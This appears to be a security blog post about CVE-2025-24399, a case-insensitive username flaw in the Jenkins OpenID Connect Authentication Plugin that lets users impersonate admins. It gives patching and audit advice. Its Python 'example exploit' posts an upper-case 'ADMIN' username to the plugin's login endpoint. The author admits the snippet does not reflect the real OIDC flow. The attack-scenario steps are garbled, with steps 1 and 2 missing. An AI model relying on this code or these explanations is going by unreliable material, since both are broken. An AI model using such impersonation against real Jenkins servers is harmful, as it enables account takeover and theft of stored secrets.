CVE-2025-24399 - Case Insensitivity Flaw in Jenkins OpenId Connect Authentication Plugin – How Attackers Can Hijack Admin Accounts

Jenkins is a widely-used open source automation server that helps automate the parts of software development related to building, testing, and deploying. If you’re running Jenkins and using OpenID Connect Authentication Plugin for single sign-on (SSO), you may be at serious risk due to a recent vulnerability – CVE-2025-24399.

This post breaks down what CVE-2025-24399 is, gives you an easy-to-understand overview, shows how attackers could exploit it (with code!), and explains how to protect yourself.

What Is CVE-2025-24399?

CVE-2025-24399 is a security vulnerability in the Jenkins OpenID Connect Authentication Plugin, versions 4.452.v2849b_d3945fa_ and earlier, except for 4.438.440.v3f5f201de5dc.

Affected component:
- OpenId Connect Authentication Plugin for Jenkins

What’s the issue?
The plugin does not properly handle the case (uppercase/lowercase) of usernames. It treats usernames as case-insensitive (e.g., “Admin” and “admin” are seen as the same), even if your OpenID Connect provider (like Google, Azure, or Okta) is case-sensitive.

Why is that bad?
This lets an attacker log in as any user by providing a username that only changes in letter case (e.g., “ADMIN” instead of “admin”). If the real admin account is “admin”, an attacker logging in as “ADMIN” could gain administrator access — a straight up security disaster.

Attack Scenario: How It Works

Let’s say your organization has an administrator account in Jenkins called admin, and your SSO (OpenID Connect provider) sees admin and ADMIN as different users.

Jenkins sees ADMIN as admin (since it ignores letter casing).

3. The attacker now has the same privileges as the admin user in Jenkins, even though they are NOT actually admin per your OpenID Connect provider!

This means any regular user could impersonate an admin just by changing the case of their username.

Example Exploit (Code Snippet)

Let’s walk through what an attacker would do in Python. The attacker knows there’s an admin account called “admin”.

import requests

OIC_AUTH_URL = "https://jenkins.example.com/securityRealm/commenceLogin?from=%2F";
TARGET_USERNAME = "ADMIN"  # Notice the upper case

# Simulate an OpenID Connect login request:
payload = {
    "username": TARGET_USERNAME,
    "password": "any-valid-password-or-token"  # The attacker’s actual OIDC credentials
}

# Normally this would require browser-based flow, here’s a simplified version
session = requests.Session()
response = session.post(OIC_AUTH_URL, data=payload, allow_redirects=True)

if "admin" in response.text.lower():
    print("Whoa! Looks like we've logged in as admin!")
else:
    print("Login failed.")

*Note*: In reality, the OpenID Connect login typically goes through redirect flows and browser interaction, but this shows how username casing is all that matters.

Why Does This Happen?

- Jenkins plugin developers assumed usernames should be case-insensitive (treating “admin” and “ADMIN” as the same).
- Most OpenID Connect providers are case-sensitive with usernames/user IDs.
- The plugin code matches users by lowercasing input, so “admin” and “ADMIN” are treated the same, ignoring what the identity provider says.

An attacker could log in as any user, including admins.

- They could create/delete jobs, access secrets, run code, or steal credentials stored in Jenkins.

1. Update the Plugin

The only SAFE action: Upgrade to the latest version.
OpenId Connect Authentication Plugin update link & changelog

- The maintainers have patched this issue by making username matching case-sensitive, respecting your OpenID Connect provider.

2. Audit Past Logins

- Check your Jenkins audit logs for suspicious logins, especially new admin sessions from unusual accounts or with usernames differing only in case.

3. Test Your Setup

Try logging in with the “wrong” case username. If Jenkins lets you in as someone else, you’re still vulnerable.

Reference Links

- Jenkins Security Advisory for CVE-2025-24399
- CVE Details for CVE-2025-24399
- OpenId Connect Authentication Plugin

Conclusion

CVE-2025-24399 is a serious security hole in Jenkins SSO setups using the OpenID Connect Authentication Plugin. If you’re affected, update your plugin right away, and check your logs for suspicious activity. A simple case difference in a username should never give someone admin rights, but in vulnerable setups, that’s all it takes!

Stay safe, and patch your Jenkins!

Have questions?
Post below or reach out to the Jenkins security team via their contact page!

Timeline

Published on: 01/22/2025 17:15:13 UTC
Last modified on: 03/18/2025 15:15:59 UTC